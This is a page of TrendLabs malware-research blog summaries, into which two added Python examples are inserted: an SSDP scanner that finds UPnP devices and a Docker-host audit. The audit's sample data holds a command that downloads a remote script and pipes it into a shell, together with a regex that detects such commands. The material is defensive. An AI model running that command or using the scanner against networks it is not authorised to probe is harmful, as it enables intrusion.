Top IT Security Bloggers

TrendLabs - Malware Blog
  • A Machine Learning Model to Detect Malware Variants

    When malware is difficult to discover — and has limited samples for analysis — we propose a machine learning model that uses adversarial autoencoder and semantic hashing to find what bad actors try to hide. We, along with researchers from the Federation University Australia, discussed this model in our study titled “Generative Malware Outbreak Detection.”
  • March’s Patch Tuesday Fixes Privilege Escalation Vulnerabilities Exploited in the Wild

    Microsoft’s Patch Tuesday for March addressed 64 vulnerabilities, 17 of which were rated critical, 45 important, one moderate, and another low in severity. Two of these vulnerabilities, CVE-2019-0797 and CVE-2019-0808, were reported to have been actively exploited in the wild. The patches addressed security flaws in a number of Microsoft products and services: .NET Framework, Edge, Exchange, Internet Explorer, Office, Office Services and Web Apps, NuGet, Team Foundation Server, and Windows. Seven of the vulnerabilities were disclosed via Trend Micro’s Zero Day Initiative (ZDI).
  • From Fileless Techniques to Using Steganography: Examining Powload’s Evolution

    In some of the recent Powload-related incidents we saw, we noticed significant changes to some of the attachments in the spam emails: the use of steganography and targeting of specific countries. Figure 2 shows the difference. For example, the samples we analyzed in early 2018 had more straightforward infection chains. These updates added another stage to the execution of malicious routines as a way to evade detection.
    The Powload variants that use these techniques drop and execute the Ursnif and Bebloh data stealers. We did not see any notable differences in the payloads’ routines. The distribution tactics also resemble a spam campaign we uncovered last year, which delivered the same information stealers but distributed via the Cutwail botnet.
  • New SLUB Backdoor Uses GitHub, Communicates via Slack

    We discovered malware that uses three different online services, including Slack and GitHub, as part of its routine. Analysis of the attacker's tools, techniques, and procedures led us to believe that this might be a targeted attack by very capable threat actors.
  • UPnP-enabled Connected Devices in the Home and Unpatched Known Vulnerabilities

    Many devices such as cameras, printers, and routers use UPnP to make it easy for them to automatically discover and vet other devices on a local network and communicate with each other for data sharing or media streaming. UPnP works with network protocols to configure communications in the network. But with its convenience come security holes that range from attackers gaining control of devices to bypassing firewall protections.
    We looked into UPnP-related events in home networks and found that many users still have UPnP enabled in their devices.
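    The discovery the paragraph describes runs over SSDP, UPnP's HTTP-over-UDP multicast. One way to see which devices on a home network still answer, and what they disclose, as an added example that is not code from the TrendLabs post: the sample reply below is constructed, and the server banner, addresses and UUID in it are made up.

```python
"""Send an SSDP M-SEARCH and parse what UPnP devices answer with.

Added example, not from the TrendLabs post. SAMPLE_RESPONSE is a constructed
reply in the shape UPnP devices return; send_probe() only runs when invoked
directly and really multicasts on the local network.
"""
import socket
from urllib.parse import urlparse

SSDP_GROUP = "239.255.255.250"
SSDP_PORT = 1900

# Constructed response from a home router's IGD service (all values made up).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"EXT:\r\n"
    b"LOCATION: http://192.168.1.1:49152/rootDesc.xml\r\n"
    b"SERVER: Linux/3.10 UPnP/1.1 Example-IGD/1.0\r\n"
    b"ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000001::urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    b"\r\n"
)


def build_msearch(search_target: str = "ssdp:all", mx: int = 2) -> bytes:
    """M-SEARCH request per the UPnP Device Architecture; ssdp:all asks every device to answer."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        f"HOST: {SSDP_GROUP}:{SSDP_PORT}",
        'MAN: "ssdp:discover"',
        f"MX: {mx}",
        f"ST: {search_target}",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_ssdp_response(raw: bytes) -> dict:
    """Header block of an SSDP 200 OK as an upper-cased dict; raises on anything else."""
    text = raw.decode("utf-8", errors="replace")
    head = text.split("\r\n\r\n", 1)[0]
    status, *header_lines = head.split("\r\n")
    if not status.startswith("HTTP/1.1 200"):
        raise ValueError(f"not an SSDP response: {status!r}")
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def triage(headers: dict, responder_ip: str) -> dict:
    """Fields worth recording per device: the description URL (the XML listing the
    SOAP control endpoints), the SERVER banner (stack and version to compare with
    vendor patch status), and whether LOCATION points at a host other than the one
    that answered, which deserves a second look."""
    location = headers.get("LOCATION", "")
    loc_host = urlparse(location).hostname or ""
    return {
        "responder": responder_ip,
        "location": location,
        "server": headers.get("SERVER"),
        "st": headers.get("ST"),
        "usn": headers.get("USN"),
        "location_matches_responder": loc_host == responder_ip,
    }


def send_probe(timeout: float = 3.0) -> list:
    """Multicast one M-SEARCH and collect every answer until the timeout (network I/O)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.settimeout(timeout)
    sock.sendto(build_msearch(), (SSDP_GROUP, SSDP_PORT))
    results = []
    try:
        while True:
            data, (ip, _port) = sock.recvfrom(65535)
            try:
                results.append(triage(parse_ssdp_response(data), ip))
            except ValueError:
                continue  # NOTIFY traffic or junk on the port
    except socket.timeout:
        pass
    finally:
        sock.close()
    return results


if __name__ == "__main__":
    for device in send_probe():
        print(device)
```

    Every device that answers is one that an attacker on the same LAN (or, for devices that also answer on the WAN side, anyone) can go on to query; the LOCATION URL is the next thing to fetch, since its XML lists the control endpoints.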
  • Exposed IoT Automation Servers and Cybercrime

    In our latest research we tested possible threat scenarios against complex IoT environments such as in smart homes and smart buildings. A significant part of the research also involved a look into exposed automation platforms or servers, which are integral components of complex IoT environments.
  • Fileless Banking Trojan Targeting Brazilian Banks Downloads Possible Botnet Capability, Info Stealers

    We analyzed a fileless banking trojan targeting three major banks in Brazil and their customers, which downloads info stealers, keyloggers and a hack tool. Infected machines can be used for a botnet and for mass-mailed targeted attacks, and our telemetry recorded the highest number of infection attempts from Brazil and Taiwan.
  • Exposed Docker Control API and Community Image Abused to Deliver Cryptocurrency-Mining Malware

    Through data analysis of the container honeypots we set up to monitor threats, we uncovered notable activity: unwanted or unauthorized cryptocurrency miners being deployed as rogue containers using a community-contributed container image published on Docker Hub. The image is being abused as part of a malicious service that delivers cryptocurrency-mining malware. Networking tools are retrieved to carry out lateral movement to other exposed containers and applications.
    The activities we uncovered are also significant in that they do not need to exploit vulnerabilities and do not depend on any version of Docker. Identifying a misconfigured, and thus exposed, Docker control API is all it could take for attackers to infect many exposed hosts.
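    The two conditions the post describes, a Docker control API reachable without authentication and community images started as rogue containers, can both be checked from the daemon configuration and from the Engine API's own container listing. The following is an added example, not code from the TrendLabs post: the daemon.json fragments and the GET /containers/json output it reads are constructed samples, and the trusted-registry allowlist is an assumption.

```python
"""Audit a Docker host for an exposed control API and rogue containers.

Added example, not from the TrendLabs post. The daemon.json fragments and
the GET /containers/json output below are constructed samples in the shape
dockerd and the Engine API produce; only the fields used here are kept.
"""
import json
import re
from urllib.parse import urlparse

# Constructed daemon.json: the weak setting beside the hardened one.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed GET /containers/json response, trimmed to the fields used here.
CONTAINERS_JSON = json.dumps([
    {"Id": "a1", "Image": "registry.example.internal/payments/api:1.4.2",
     "Command": "/app/server", "Mounts": [],
     "HostConfig": {"NetworkMode": "bridge"}},
    {"Id": "b2", "Image": "somebody/miner-runner:latest",
     "Command": "sh -c 'wget -qO- http://203.0.113.10/x.sh | sh'", "Mounts": [],
     "HostConfig": {"NetworkMode": "host"}},
    {"Id": "c3", "Image": "library/alpine:3.9", "Command": "sh",
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host"}],
     "HostConfig": {"NetworkMode": "bridge"}},
])

PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


def api_exposure(daemon_json: str) -> list:
    """Findings for 'hosts' entries that serve the Engine API over TCP.

    Anyone who can reach an unauthenticated tcp:// listener can run
    arbitrary containers, which is the misconfiguration the post relies on.
    """
    cfg = json.loads(daemon_json)
    tls_client_auth = bool(cfg.get("tlsverify"))
    findings = []
    for host in cfg.get("hosts", []):
        url = urlparse(host)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// listeners are local-only
        if not tls_client_auth:
            findings.append(f"{host}: Engine API over plain TCP, no client authentication")
        elif url.hostname in (None, "", "0.0.0.0", "::"):
            findings.append(f"{host}: TLS-protected but bound to every interface")
    return findings


def image_registry(image: str) -> str:
    """Registry an image reference resolves to: docker.io unless the first path
    component looks like a host (contains '.' or ':', or is 'localhost')."""
    first = image.split("/", 1)[0]
    if "/" in image and ("." in first or ":" in first or first == "localhost"):
        return first
    return "docker.io"


def rogue_containers(containers_json: str, trusted_registries) -> list:
    """Flag containers pulled from an untrusted registry or reaching into the
    host (host network, root bind mount, remote script piped to a shell).
    Returns [{'id', 'image', 'reasons'}] for the flagged ones."""
    flagged = []
    for c in json.loads(containers_json):
        reasons = []
        image = c.get("Image", "")
        registry = image_registry(image)
        if registry not in trusted_registries:
            reasons.append(f"image from untrusted registry {registry}")
        if c.get("HostConfig", {}).get("NetworkMode") == "host":
            reasons.append("host network namespace")
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and m.get("Source") == "/":
                reasons.append("host root filesystem bind-mounted")
        if PIPE_TO_SHELL.search(c.get("Command", "")):
            reasons.append("command pipes a remote download into a shell")
        if reasons:
            flagged.append({"id": c["Id"], "image": image, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(name, api_exposure(cfg) or "no findings")
    for hit in rogue_containers(CONTAINERS_JSON, {"registry.example.internal"}):
        print(hit["id"], hit["image"], "; ".join(hit["reasons"]))
```

    On a live host the same checks run against the real files: daemon.json from /etc/docker, and the container list from `docker ps` or `GET /containers/json` on the socket. The hardened fragment still needs the CA in tlscacert to be one you control; tlsverify without that just moves the trust problem.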
  • Shifting Strategies: Using Social Media, SEO in Tech Support Scams

    Tech support scams have diversified into new territory. They now use pop-up alerts and social engineering tactics to spread fake toll-free numbers and links to their fake tech support websites on popular social media platforms.
  • How a Hacking Group is Stealing Popular Instagram Profiles

    Social media influencers build and expand their business or brand through credibility and authenticity to their audience. For hackers, however, they could be seen as trophies. That’s what happened to a photographer with more than 15,000 followers on Instagram, when she had her account stolen.
    A closer look into the incident revealed that the hacker got into her account through phishing. While it seemed straightforward enough, we also found that targeting popular Instagram profiles has become the modus operandi of a certain group of Turkish-speaking hackers. And by abusing Instagram's account recovery process, they were able to keep the stolen account even when the victim followed the process exactly. We have seen cases where owners of Instagram profiles with between 15,000 and 70,000 followers were hacked and the accounts were never retrieved. The victims ranged from famous actors and singers to owners of startup businesses such as photoshoot equipment rentals.